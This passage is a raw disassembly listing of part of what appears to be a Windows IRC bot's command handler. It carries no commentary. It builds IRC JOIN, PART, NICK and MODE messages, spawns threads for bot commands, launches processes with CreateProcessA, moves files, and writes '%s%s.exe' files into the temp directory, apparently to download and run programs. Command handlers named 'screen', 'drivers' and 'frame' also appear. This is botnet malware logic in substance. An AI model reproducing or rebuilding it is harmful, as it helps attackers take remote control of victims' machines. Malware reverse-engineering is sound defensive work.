mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_40831F
push 3Fh ; Count
lea eax, [ebp+var_16B8]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_40831F: ; CODE XREF: sub_401CC7+6644�j
lea eax, [ebp+var_16F8]
mov [ebp+var_1624], 1
push eax
lea eax, [ebp+var_1778]
push [ebp+var_1628]
push eax
lea eax, [ebp+Dst]
push offset asc_442C84 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Fh ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_1620], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_177C]
push ebx
push eax
push offset sub_4019E7
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1620]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4083AB
loc_408395: ; CODE XREF: sub_401CC7+66E2�j
cmp [ebp+var_161C], ebx
jnz loc_406F59
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_408395
; ---------------------------------------------------------------------------
loc_4083AB: ; CODE XREF: sub_401CC7+66CC�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442CB4
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4083BC: ; CODE XREF: sub_401CC7+4C04�j
; sub_401CC7+4C1B�j
push edi ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_1D64], eax
jle loc_4084AF
push [ebp+Source] ; Format
mov esi, 80h
lea eax, [ebp+var_1EEC]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_1D60], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF0], eax
lea eax, [ebp+var_1DEC]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1D5C], eax
mov eax, [ebp+var_8]
push edi
mov [ebp+var_1D58], eax
push [ebp+Source]
lea eax, [ebp+Dst]
push offset asc_442BDC ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 15h ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_1D6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF0]
push ebx
push eax
push offset sub_41391E
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1D6C]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40849E
loc_40848C: ; CODE XREF: sub_401CC7+67D5�j
cmp [ebp+var_1D54], ebx
jnz short loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40848C
; ---------------------------------------------------------------------------
loc_40849E: ; CODE XREF: sub_401CC7+67C3�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442C08
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_4084AF: ; CODE XREF: sub_401CC7+6704�j
push offset unk_442C40
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_4084B9: ; CODE XREF: sub_401CC7+4BD6�j
; sub_401CC7+4BED�j
push edi
push [ebp+Source]
call ds:dword_4F5388 ; MoveFileA
test eax, eax
jz short loc_4084E6
push edi
lea eax, [ebp+Dst]
push [ebp+Source]
push offset asc_442B98 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_408506
; ---------------------------------------------------------------------------
loc_4084E6: ; CODE XREF: sub_401CC7+67FE�j
push offset dword_442BBC
call sub_418E65
pop ecx
push eax ; Format
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
loc_408503: ; CODE XREF: sub_401CC7+2F1B�j
; sub_401CC7+55F0�j
add esp, 0Ch
loc_408506: ; CODE XREF: sub_401CC7+2127�j
; sub_401CC7+2EBD�j ...
cmp [ebp+var_8], ebx
jnz loc_408637
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_408523: ; CODE XREF: sub_401CC7+5847�j
call sub_409D34
add esp, 14h
jmp loc_408637
; ---------------------------------------------------------------------------
loc_408530: ; CODE XREF: sub_401CC7+4BA8�j
; sub_401CC7+4BBF�j
push [ebp+Source] ; Format
lea eax, [ebp+var_3F04]
push 104h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_40856A
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40856A
push eax ; Format
lea eax, [ebp+var_3E00]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40856A: ; CODE XREF: sub_401CC7+6883�j
; sub_401CC7+6892�j
push [ebp+Format] ; Format
lea eax, [ebp+var_3F84]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_3F88], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CF8], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF4], eax
lea eax, [ebp+var_3E00]
push eax
lea eax, [ebp+var_3F04]
push eax
push offset asc_442B20 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 24h ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov [ebp+var_3CFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F88]
push ebx
push eax
push offset sub_417822
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3CFC]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40861C
loc_40860A: ; CODE XREF: sub_401CC7+6953�j
cmp [ebp+var_3CF0], ebx
jnz short loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40860A
; ---------------------------------------------------------------------------
loc_40861C: ; CODE XREF: sub_401CC7+6941�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset asc_442B50 ; "-"
loc_408628: ; CODE XREF: sub_401CC7+90D�j
; sub_401CC7+A4B�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408637: ; CODE XREF: sub_401CC7+7D2�j
; sub_401CC7+934�j ...
push 1
pop esi
jmp loc_406F7D
; ---------------------------------------------------------------------------
loc_40863F: ; CODE XREF: sub_401CC7+4B7A�j
; sub_401CC7+4B91�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
push 1
mov [ebp+var_668], esi
pop esi
mov [ebp+var_638], bx
push [ebp+Source] ; Str
mov [ebp+var_63C], esi
call _atoi
add esp, 10h
cmp eax, esi
jnz short loc_40867E
mov [ebp+var_638], 5
loc_40867E: ; CODE XREF: sub_401CC7+69AC�j
cmp [ebp+var_C], ebx
jz loc_406F59
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_406F59
lea eax, [ebp+var_E10]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jnz short loc_4086C7
push offset unk_442AD0
jmp loc_408850
; ---------------------------------------------------------------------------
loc_4086C7: ; CODE XREF: sub_401CC7+69F4�j
push edi
push offset dword_442AF4
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4086D2: ; CODE XREF: sub_401CC7+4B4C�j
; sub_401CC7+4B63�j
push edi ; Str2
push offset aTrb ; "trb"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40884B
lea eax, [ebp+var_48F0]
push eax
push 104h
call ds:dword_4F5384 ; GetTempPathA
push 0FFh ; Count
lea eax, [ebp+var_25D0]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_17D0]
push eax
call sub_40B135
add esp, 10h
push eax
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+var_24D0]
push offset aSS_exe ; "%s%s.exe"
push eax ; Dest
call _sprintf
mov eax, [ebp+esi+Str2]
add esp, 10h
cmp eax, ebx
mov [ebp+var_23CC], 1
mov [ebp+var_23C8], ebx
jz short loc_408767
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_23C0], eax
jmp short loc_40876D
; ---------------------------------------------------------------------------
loc_408767: ; CODE XREF: sub_401CC7+6A8A�j
mov [ebp+var_23C0], ebx
loc_40876D: ; CODE XREF: sub_401CC7+6A9E�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_408784
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_23C4], eax
jmp short loc_40878A
; ---------------------------------------------------------------------------
loc_408784: ; CODE XREF: sub_401CC7+6AAC�j
mov [ebp+var_23C4], ebx
loc_40878A: ; CODE XREF: sub_401CC7+6ABB�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_23BC], eax
lea eax, [ebp+var_2650]
mov [ebp+var_2654], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_23B4], eax
mov eax, [ebp+var_8]
push [ebp+Source]
mov [ebp+var_23B8], eax
lea eax, [ebp+Dst]
push offset asc_442A14 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Eh ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov [ebp+var_23D0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2654]
push ebx
push eax
push offset sub_416F62
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_23D0]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40883A
loc_408824: ; CODE XREF: sub_401CC7+6B71�j
cmp [ebp+var_23B0], ebx
jnz loc_406F59
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_408824
; ---------------------------------------------------------------------------
loc_40883A: ; CODE XREF: sub_401CC7+6B5B�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442A40
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_40884B: ; CODE XREF: sub_401CC7+6A1A�j
push offset asc_442A7C ; "-"
loc_408850: ; CODE XREF: sub_401CC7+2E64�j
; sub_401CC7+4574�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_406F59
; ---------------------------------------------------------------------------
loc_408863: ; CODE XREF: sub_401CC7+4B1E�j
; sub_401CC7+4B35�j
push dword ptr [ebp+Args] ; Str2
push offset a332_0 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402085
cmp [ebp+var_C], ebx
jz loc_402085
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
pop ecx
push eax
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push [ebp+Source] ; Str
call _atoi
add esp, 28h
test eax, eax
jle short loc_4088EE
push [ebp+Source] ; Str
call _atoi
imul eax, 3E8h
pop ecx
push eax
call ds:dword_4F534C ; Sleep
loc_4088EE: ; CODE XREF: sub_401CC7+6C0F�j
push offset dword_4429E8
call sub_415C3F
mov eax, [ebp+File]
pop ecx
inc eax
jmp loc_402088
; ---------------------------------------------------------------------------
loc_408902: ; CODE XREF: sub_401CC7+4AF0�j
; sub_401CC7+4B07�j
push dword ptr [ebp+Args] ; Str2
push offset a332_1 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402085
cmp [ebp+var_C], ebx
jz loc_409B16
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
inc edi
push offset aRepeat_0 ; "repeat"
push edi ; Str1
mov esi, eax
call _strcmp
add esp, 10h
test eax, eax
push esi
jz short loc_4089C0
push [ebp+Format]
lea eax, [ebp+Dst]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push offset asc_44297C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push [ebp+Source] ; Str
call _atoi
add esp, 14h
test eax, eax
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
add eax, [ebp+File]
pop ecx
jmp loc_402088
; ---------------------------------------------------------------------------
loc_4089C0: ; CODE XREF: sub_401CC7+6C7B�j
push offset asc_442994 ; "-"
loc_4089C5: ; CODE XREF: sub_401CC7+75EB�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4089D4: ; CODE XREF: sub_401CC7+7573�j
; sub_401CC7+76CC�j
cmp [ebp+var_8], ebx
jnz short loc_4089F5
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_4089F5: ; CODE XREF: sub_401CC7+6D10�j
; sub_401CC7+7370�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C3F
jmp loc_409B15
; ---------------------------------------------------------------------------
loc_408A06: ; CODE XREF: sub_401CC7+4AC2�j
; sub_401CC7+4AD9�j
push 7Fh ; Count
lea eax, [ebp+var_2214]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2194]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2114]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 24h
mov esi, [ebp+arg_4]
mov [ebp+var_2090], eax
mov eax, [ebp+var_8]
push edi
push [ebp+Source]
mov [ebp+var_208C], eax
lea eax, [ebp+Dst]
mov [ebp+var_2218], esi
push offset asc_4428E4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Fh ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_2094], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2218]
push ebx
push eax
push offset sub_414E4C
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2094]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_408AC6
loc_408AB4: ; CODE XREF: sub_401CC7+6DFD�j
cmp [ebp+var_2088], ebx
jnz short loc_408AE1
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_408AB4
; ---------------------------------------------------------------------------
loc_408AC6: ; CODE XREF: sub_401CC7+6DEB�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset asc_442918 ; "-"
loc_408AD2: ; CODE XREF: sub_401CC7+6F0A�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408AE1: ; CODE XREF: sub_401CC7+6DF3�j
; sub_401CC7+6EEE�j
cmp [ebp+var_8], ebx
jnz loc_4098F2
push ebx
lea eax, [ebp+Dst]
push [ebp+var_4]
push eax
push [ebp+Format]
push esi
jmp loc_4098EA
; ---------------------------------------------------------------------------
loc_408B01: ; CODE XREF: sub_401CC7+4A94�j
; sub_401CC7+4AAB�j
push 7Fh ; Count
lea eax, [ebp+var_23A8]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2328]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_22A8]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 24h
mov esi, [ebp+arg_4]
mov [ebp+var_2224], eax
mov eax, [ebp+var_8]
push edi
push [ebp+Source]
mov [ebp+var_2220], eax
lea eax, [ebp+Dst]
mov [ebp+var_23AC], esi
push offset asc_442870 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 11h ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_2228], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23AC]
push ebx
push eax
push offset sub_4145F8
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_2228]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_408BC5
loc_408BAF: ; CODE XREF: sub_401CC7+6EFC�j
cmp [ebp+var_221C], ebx
jnz loc_408AE1
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_408BAF
; ---------------------------------------------------------------------------
loc_408BC5: ; CODE XREF: sub_401CC7+6EE6�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_44289C
jmp loc_408AD2
; ---------------------------------------------------------------------------
loc_408BD6: ; CODE XREF: sub_401CC7+4A66�j
; sub_401CC7+4A7D�j
push edi
lea eax, [ebp+Dst]
push offset aPartS_0 ; "PART %s"
push eax ; Dest
call _sprintf
push [ebp+Source] ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_14 ; "%s\r\n"
loc_408C1B: ; CODE XREF: sub_401CC7+6FBF�j
; sub_401CC7+7B1D�j
push [ebp+Source] ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409CEE
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_408C3A: ; CODE XREF: sub_401CC7+4A38�j
; sub_401CC7+4A4F�j
push [ebp+esi+Str2]
lea eax, [ebp+Dst]
push edi
push offset aJoinSS_1 ; "JOIN %s %s"
push eax ; Dest
call _sprintf
push [ebp+Source] ; Str
call _atoi
add esp, 14h
test eax, eax
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
lea eax, [ebp+Dst]
push eax
push offset aS_15 ; "%s\r\n"
jmp short loc_408C1B
; ---------------------------------------------------------------------------
loc_408C88: ; CODE XREF: sub_401CC7+4A0A�j
; sub_401CC7+4A21�j
push edi
lea eax, [ebp+Dst]
push offset aNickS_5 ; "NICK %s"
push eax ; Dest
call _sprintf
mov esi, [ebp+Source]
push esi ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_409B16
push esi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_16 ; "%s\r\n"
push esi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409CEE
add esp, 0Ch
push edi
push esi ; Args
push offset dword_44280C ; Format
loc_408CEE: ; CODE XREF: sub_401CC7+70B2�j
; sub_401CC7+7121�j ...
call sub_415CB3
jmp loc_404B1E
; ---------------------------------------------------------------------------
loc_408CF8: ; CODE XREF: sub_401CC7+49DC�j
; sub_401CC7+49F3�j
cmp [ebp+var_C], ebx
jz loc_409B16
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408D27
push esi
lea eax, [ebp+Dst]
push offset aModeS ; "MODE %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408D27: ; CODE XREF: sub_401CC7+7049�j
mov edi, [ebp+Source]
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B16
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_17 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409CEE
add esp, 0Ch
push esi
push edi
push offset dword_4427D4
jmp loc_408CEE
; ---------------------------------------------------------------------------
loc_408D7E: ; CODE XREF: sub_401CC7+49AE�j
; sub_401CC7+49C5�j
cmp [ebp+var_C], ebx
jz loc_409B16
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B16
mov edi, [ebp+Source]
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B16
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
push esi ; Args
push offset aS_18 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409CEE
add esp, 0Ch
push esi
push edi
push offset dword_44279C
jmp loc_408CEE
; ---------------------------------------------------------------------------
loc_408DED: ; CODE XREF: sub_401CC7+4980�j
; sub_401CC7+4997�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B16
push esi ; Args
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push esi
push offset unk_44276C
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_408E29: ; CODE XREF: sub_401CC7+4952�j
; sub_401CC7+4969�j
push dword ptr [ebp+Args] ; Str2
push offset a332_2 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402085
push edi ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
push [ebp+Source] ; Str
call _atoi
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_4F534C ; Sleep
push [ebp+esi+Str2]
push edi ; Args
push offset aJoinSS_2 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
push offset dword_442740
call sub_415C3F
jmp loc_40370A
; ---------------------------------------------------------------------------
loc_408E8D: ; CODE XREF: sub_401CC7+4924�j
; sub_401CC7+493B�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push edi ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409B16
push esi
lea eax, [ebp+Dst]
push offset dword_4426EC ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push [ebp+Source] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 20h
push esi
push [ebp+Source]
push offset unk_4426F8
jmp loc_408CEE
; ---------------------------------------------------------------------------
loc_408EFA: ; CODE XREF: sub_401CC7+48F6�j
; sub_401CC7+490D�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push edi ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409B16
push ebx ; int
push ebx ; int
push esi ; int
push [ebp+Source] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
push esi
push [ebp+Source]
push offset unk_4426C0
jmp loc_408CEE
; ---------------------------------------------------------------------------
loc_408F4F: ; CODE XREF: sub_401CC7+48C8�j
; sub_401CC7+48DF�j
cmp [ebp+var_C], ebx
jz loc_402085
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_402085
push eax ; int
push [ebp+Source] ; Str2
call sub_415B47
pop ecx
pop ecx
push [ebp+Source]
push offset asc_442694 ; "-"
loc_408F7E: ; CODE XREF: sub_401CC7+58D3�j
; sub_401CC7+7BF2�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4098D1
; ---------------------------------------------------------------------------
loc_408F92: ; CODE XREF: sub_401CC7+489A�j
; sub_401CC7+48B1�j
push edi ; int
push [ebp+Source] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41927E
jmp loc_4042E7
; ---------------------------------------------------------------------------
loc_408FAC: ; CODE XREF: sub_401CC7+485C�j
; sub_401CC7+4871�j
push [ebp+Source] ; SubStr
push [ebp+arg_1C] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_409B16
mov esi, [ebp+esi+Format]
cmp esi, ebx
jz loc_409054
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40903C
push esi
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS_1 ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push [ebp+Source]
push offset asc_442604 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
inc [ebp+File]
jmp loc_4089F5
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: sub_401CC7+7318�j
lea eax, [ebp+Dst]
push offset asc_44262C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4089F5
; ---------------------------------------------------------------------------
loc_409054: ; CODE XREF: sub_401CC7+7303�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41BBE0
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
lea eax, [ebp+Dst]
push [ebp+Source]
push offset asc_44265C ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp loc_4089F5
; ---------------------------------------------------------------------------
loc_4090A0: ; CODE XREF: sub_401CC7+4832�j
; sub_401CC7+4847�j
push offset aScreen ; "screen"
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4090FB
mov edi, [ebp+esi+Format]
cmp edi, ebx
jz short loc_4090E8
push edi
call sub_415F1E
cmp eax, 1
pop ecx
jnz short loc_4090E1
push edi
lea eax, [ebp+Dst]
push offset asc_4423A4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4090FB
; ---------------------------------------------------------------------------
loc_4090E1: ; CODE XREF: sub_401CC7+7401�j
push offset unk_4423D0
jmp short loc_4090ED
; ---------------------------------------------------------------------------
loc_4090E8: ; CODE XREF: sub_401CC7+73F5�j
push offset asc_442400 ; "-"
loc_4090ED: ; CODE XREF: sub_401CC7+741F�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4090FB: ; CODE XREF: sub_401CC7+73EA�j
; sub_401CC7+7418�j
push offset aDrivers ; "drivers"
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409188
xor edi, edi
loc_409110: ; CODE XREF: sub_401CC7+74AC�j
lea eax, [ebp+var_53F8]
push 1FFh
push eax
lea eax, [ebp+var_4EF0]
push 0FFh
push eax
push edi
call dword_4E3128
test eax, eax
jz short loc_40916F
lea eax, [ebp+var_53F8]
push eax
lea eax, [ebp+var_4EF0]
push eax
push edi
lea eax, [ebp+var_5D88]
push offset asc_442444 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_5D88]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 28h
loc_40916F: ; CODE XREF: sub_401CC7+746A�j
inc edi
cmp edi, 0Ah
jl short loc_409110
lea eax, [ebp+Dst]
push offset asc_44246C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_409188: ; CODE XREF: sub_401CC7+7445�j
push offset aFrame ; "frame"
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409229
cmp [ebp+esi+Format], ebx
jz short loc_409216
cmp [ebp+esi+Str2], ebx
jz short loc_409216
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_409216
mov eax, [ebp+esi+var_7C]
cmp eax, ebx
jz short loc_409216
push eax ; Str
call _atoi
pop ecx
push eax ; int
push edi ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Str2] ; Str
call _atoi
pop ecx
push eax ; Size
push [ebp+esi+Format] ; int
call sub_416159
add esp, 10h
test eax, eax
jnz short loc_40920F
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset asc_44249C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_409229
; ---------------------------------------------------------------------------
loc_40920F: ; CODE XREF: sub_401CC7+7529�j
push offset unk_4424C8
jmp short loc_40921B
; ---------------------------------------------------------------------------
loc_409216: ; CODE XREF: sub_401CC7+74DF�j
; sub_401CC7+74E8�j ...
push offset asc_4424FC ; "-"
loc_40921B: ; CODE XREF: sub_401CC7+754D�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
